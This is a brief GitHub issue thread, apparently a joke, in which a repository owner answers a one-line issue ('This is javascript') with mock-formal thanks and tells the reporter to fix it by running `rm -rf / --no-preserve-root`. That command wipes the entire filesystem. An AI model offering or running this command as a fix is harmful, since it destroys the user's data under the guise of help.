### ISSUE TITLE
Big Issue

### ISSUE THREAD

**Issue by adamtanana** [MarkSonn/Vuetify-Abstractified#1]
This is javascript

**Comment by MarkSonn** [comment]
Hi Adam,

Thank you for raising this issue, it's great to have talented community members like you contributing to big boy projects. You can resolve this issue by typing the following command into your beep-boop device's "terminal" application:
`rm -rf / --no-preserve-root`
I'm going to preemptively go ahead and close this issue, but feel free to leave another comment if this doesn't resolve your issue :)

Kind regards,
Mark Sonnenschein
CEO, Pioneer and Visionary of Vuetify-Abstractified
